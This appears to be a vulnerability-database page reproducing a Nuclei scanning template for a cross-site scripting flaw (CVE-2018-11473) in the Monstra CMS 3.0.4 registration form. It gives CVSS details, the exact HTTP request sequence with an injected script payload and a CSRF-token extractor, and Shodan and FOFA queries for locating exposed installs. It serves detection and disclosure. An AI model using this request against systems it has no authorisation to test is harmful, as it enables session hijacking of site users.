Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-11473
HistoryJan 09, 2023 - 5:47 a.m.

Monstra CMS 3.0.4 - Cross-Site Scripting

2023-01-0905:47:56
ProjectDiscovery
github.com
27
cve
cross-site scripting
monstra cms
security vulnerability
theft of sensitive information
session hijacking.

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

41.4%

Monstra CMS 3.0.4 contains a cross-site scripting vulnerability via the registration form (i.e., the login parameter to users/registration). An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
id: CVE-2018-11473

info:
  name: Monstra CMS 3.0.4 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Monstra CMS 3.0.4 contains a cross-site scripting vulnerability via the registration form (i.e., the login parameter to users/registration). An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version of Monstra CMS or apply the vendor-provided patch to fix the XSS vulnerability.
  reference:
    - https://github.com/monstra-cms/monstra/issues/446
    - https://github.com/nikhil1232/Monstra-CMS-3.0.4-XSS-ON-Registration-Page
    - https://nvd.nist.gov/vuln/detail/CVE-2018-11473
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-11473
    cwe-id: CWE-79
    epss-score: 0.001
    epss-percentile: 0.4118
    cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: monstra
    product: monstra
    shodan-query: http.favicon.hash:419828698
    fofa-query: icon_hash=419828698
  tags: cve,cve2018,xss,mostra,mostracms,cms,monstra

http:
  - raw:
      - |
        GET /users/registration HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /users/registration HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test&register=Register

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "><script>alert(document.domain)</script>"
          - "Monstra"
        case-insensitive: true
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'id="csrf" name="csrf" value="(.*)">'
        internal: true
        part: body
# digest: 4a0a00473045022036c1c6320032b7d766da8547f80ca65da333066602f3c266752775429737766e022100df63b38dfd53ec3807a099db7b983469085a94bc866637ce7a4da3a1f8c7137a:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

41.4%

Related for NUCLEI:CVE-2018-11473